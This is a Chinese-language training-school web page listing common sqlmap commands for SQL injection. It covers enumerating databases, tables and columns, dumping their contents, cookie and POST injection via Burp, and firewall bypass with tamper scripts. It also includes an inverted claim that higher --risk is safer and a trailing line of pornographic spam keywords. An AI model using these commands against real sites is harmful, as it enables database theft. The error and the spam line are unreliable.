<progress id="cjy1t"></progress>
    1. <button id="cjy1t"></button>

    2. <rp id="cjy1t"></rp>

    3. 15320004362

      sqlmap常用命令

      日期:2020年10月15日 17:58 訪問:562 作者:必火安全學院
      第十一期開班時間:2021年9月14日

      搶先領取全套VIP視頻教程

      +10天免費學習名額

        已有8166人參加


      視頻課程

      姓名 選填

      電話

        張*燕188****220722分鐘前

        王*軍186****864498分鐘前

        李*如189****445354分鐘前

      >>  稍后老師聯系您發送相關視頻課程  <<



      報名CTF挑戰賽,  預約名師指導

        已有 2366 人參加
      姓名 選填

      電話

        郭*明170****234291分鐘前

        趙*東189****289646分鐘前

        蔡*培135****589722分鐘前





         

      網絡安全滲透測試群(必火安全學院):信息安全滲透測試群

      護網行動日薪千元(初級中級高級)群:護網行動必火業余班級

      sqlmap常用命令總結:
      注意:命令為kali linux中運行的 (windows中用python sqlmap.py執行)
       
      1#、注入六連:
      1.   sqlmap -u  "http://www.xx.com?id=x"    【查詢是否存在注入點
       
      2.     --dbs         【檢測站點包含哪些數據庫
       
      3.     --current-db    【獲取當前的數據庫名
       
      4.     --tables -D "db_name"  【獲取指定數據庫中的表名 -D后接指定的數據庫名稱
       
      5.     --columns  -T "table_name" -D "db_name"  【獲取數據庫表中的字段
       
      6.     --dump -C "columns_name" -T "table_name" -D "db_name"  【獲取字段的數據內容
       
      2#、COOKIE注入:
      sqlmap -u "http://www.xx.com?id=x" --cookie "cookie" --level 2  【cookie注入 后接cookie值
       
      3#、POST注入:
      (1)目標地址http:// www.xxx.com /login.asp
      (2)打開brup代理。
      (3)點擊表單提交
      (4)burp獲取攔截信息(post)
      (5)右鍵保存文件(.txt)到指定目錄下
      (6)運行sqlmap并執行如下命令:
      用例:sqlmap -r okay.txt  -p  username
       
      // -r表示加載文件(及步驟(5)保存的路徑),-p指定參數(即攔截的post請求中表單提交的用戶名或密碼等name參數)
       
      (7)自動獲取表單:--forms自動獲取表單
       
      例如:sqlmap -u www.xx.com/login.asp --forms
       
      (8)指定參數搜索:--data
       
      例如:sqlmap -u www.xx.com/login.asp --data "username=1"
       
      4#、常用指令:
      1.    --purge      【重新掃描(--purge 刪除原先對該目標掃描的記錄)
       
      2.    --tables      【獲取表名
       
      3.     --dbs         【檢測站點包含哪些數據庫
       
      4.     --current-db    【獲取當前的數據庫名
       
      5.     --current-user  【檢測當前用戶
       
      6.    --is-dba   【判斷站點的當前用戶是否為數據庫管理員
       
      7.    --batch      【默認確認,不詢問你是否輸入
       
      8.    --search  【后面跟參數 -D -T -C 搜索列(C),表(T)和或數據庫名稱(D)
       
      9.    --threads 10  【線程,sqlmap線程最高設置為10
       
      10.  --level 3        【sqlmap默認測試所有的GET和POST參數,當--level的值大于等于2的時候也會測試HTTP Cookie頭
                                      的值,當大于等于3的時候也會測試User-Agent和HTTP Referer頭的值。最高為5
      11.  --risk 3           【執行測試的風險(0-3,默認為1)risk越高,越慢但是越安全
       
      12.     -v   【詳細的等級(0-6)
                0:只顯示Python的回溯,錯誤和關鍵消息。
                1:顯示信息和警告消息。
                2:顯示調試消息。
                3:有效載荷注入。
                4:顯示HTTP請求。
                5:顯示HTTP響應頭。
                6:顯示HTTP響應頁面的內容
       
      13.    --privileges  【查看權限
       
      14.   --tamper xx.py,cc.py   【防火墻繞過,后接tamper庫中的py文件
       
      15.  --method "POST" --data "page=1&id=2"   【POST方式提交數據
       
      16.  --threads number  【采用多線程 后接線程數
       
      17.  --referer  ""  【使用referer欺騙
       
      18.  --user-agent ""     【自定義user-agent
       
      19.  --proxy “目標地址″   【使用代理注入





      Sqlmap是一個數據庫操作工具,可以判斷注入數據庫的參數和數據庫類型,幫助用戶讀出數據。它可以支持很多類型數據庫,比如現在流行的三大數據庫:mysql、Oracle、sqlite,這三個數據在很多公司學校都被應用。它還至此其他六種偏門的數據庫,因此,這款工具的使用范圍很廣。
      Sqlmap的五種注入模式
      這個數據庫工具有五種注入模式,每一種注入模式可以識別不同的信息,基于時間的注入,不能查看頁面的內容,但是可以識別出現在的時間?;赽ool的注入,可以判斷頁面的條件是否是真,可以用來識別密碼是否準確,搭配報錯注入,就可以機械式的進行密碼嘗試,從而成功進入數據庫。
      Sqlmap的基本命令
      這款工具命令的語句不多,很多都是常見的。比如選項命令,-version,就可以打印出程序的版本號,比如目標命令,-d DIRECT 連接數據庫。還有請求命令,請求命令是最常見的,實用性很高,這些命令可以發出以什么方式連接目標的URL。--data==DATA 就是通過POST請求,發送數據字符串,--random-agent 隨機使用HTTP協議的User-Agent頭等等。
      Windows注冊表的訪問及其他命令
      除了一些常用的命令,還有一些輔助命令,比如可以訪問后端數據庫的操作系統的注冊表,還可以設置一些一般的工作參數,和利用蠻力檢查用戶自定義函數是否準確。一些具有權限的文件夾,也可以通過暴力破解。
       next 下一篇:SQL注入怎么檢測?
      欧美视频无砖专区一中文字目_玩肥熟老妇bbw视频_久久五月精品中文字幕_女人zozozo人禽交